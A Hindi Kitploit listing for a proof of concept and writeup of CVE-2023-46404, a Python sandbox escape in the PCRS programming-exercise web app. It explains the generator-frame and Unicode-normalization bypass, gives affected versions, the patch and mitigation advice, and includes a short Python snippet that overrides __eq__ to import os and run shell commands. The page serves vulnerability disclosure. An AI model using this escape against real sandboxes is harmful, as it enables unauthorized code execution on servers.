Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-46404 — CVE-2023-46404 के लिए PoC और Writeup | Kitploit
उपकरण/GitHubGitHub/windecks/cve-2023-46404
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेपर और शोधलर्निंग और शिक्षा
GitHubwindecks/cve-2023-46404

CVE-2023-46404

CVE-2023-46404 के लिए PoC और Writeup

रिपॉजिटरी देखें
32 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-46404

PCRS टोरंटो विश्वविद्यालय में विकसित ऑनलाइन प्रोग्रामिंग अभ्यासों के लिए एक वेब ऐप है। Bitbucket रिपॉजिटरी देखें: https://bitbucket.org/utmandrew/pcrs/src/3.11/

सारांश

PCRS का “Questions” पृष्ठ (कोड सबमिशन के साथ) और “Code editor” पृष्ठ Python सैंडबॉक्सिंग से बचकर रिमोट कोड निष्पादन (RCE) की चपेट में हैं।

विवरण

PCRS इंस्टेंसों में जनरेटर ऑब्जेक्ट्स के उपयोग से रिमोट कोड निष्पादन प्राप्त किया जा सकता है। जनरेटर फ्रेम्स (gi_frame) और f_back का उपयोग करके, स्क्रिप्ट सैंडबॉक्स्ड स्टैक फ्रेम से बाहर निकल सकती हैं और बिना सैंडबॉक्स वाले वातावरण में दुर्भावनापूर्ण कोड निष्पादित कर सकती हैं। इसके अतिरिक्त, यूनिकोड सामान्यीकरण आसानी से बुनियादी इनपुट सैनिटाइज़ेशन को बायपास कर सकता है। न्यूनतम विशेषाधिकारों वाला कोई भी प्रमाणित उपयोगकर्ता इस हमले को अंजाम दे सकता है। अधिक विवरण के लिए PoC देखें।

ज्ञात प्रभावित संस्करण

  • PCRS <= 3.11 d0de1e Python निष्पादन के साथ।
  • पैच 9326ad3 में लागू किया गया, जिसमें आंशिक शमन fbaedd3 में है।

शमन

सुरक्षित आइसोलेशन तंत्रों को शून्य से तैयार करना अनदेखी और कमजोरियों के प्रति प्रवण है। हमेशा की तरह, किसी भाषा के बजाय निष्पादन वातावरण (execution environment) को सैंडबॉक्स करना बेहतर है।

अतिरिक्त

प्रतिबंधित वातावरण में __eq__ को ओवरराइड करने का उपयोग किया जा सकता है:

root@kitploit:~
def f():
    mod_name = "os"
    fake_name = "json"
    os = __import__(type("s", (str,), {"__eq__": lambda x, y: y == fake_name or y == mod_name, "__hash__": lambda x: hash(mod_name)})(mod_name))
    os.system("id > /tmp/test.txt")
    s = ᵒpen("/tmp/test.txt").read() # unicode normalization of the "open" function
    os.system("rm /tmp/test.txt")
    return s
टूल डाउनलोड करें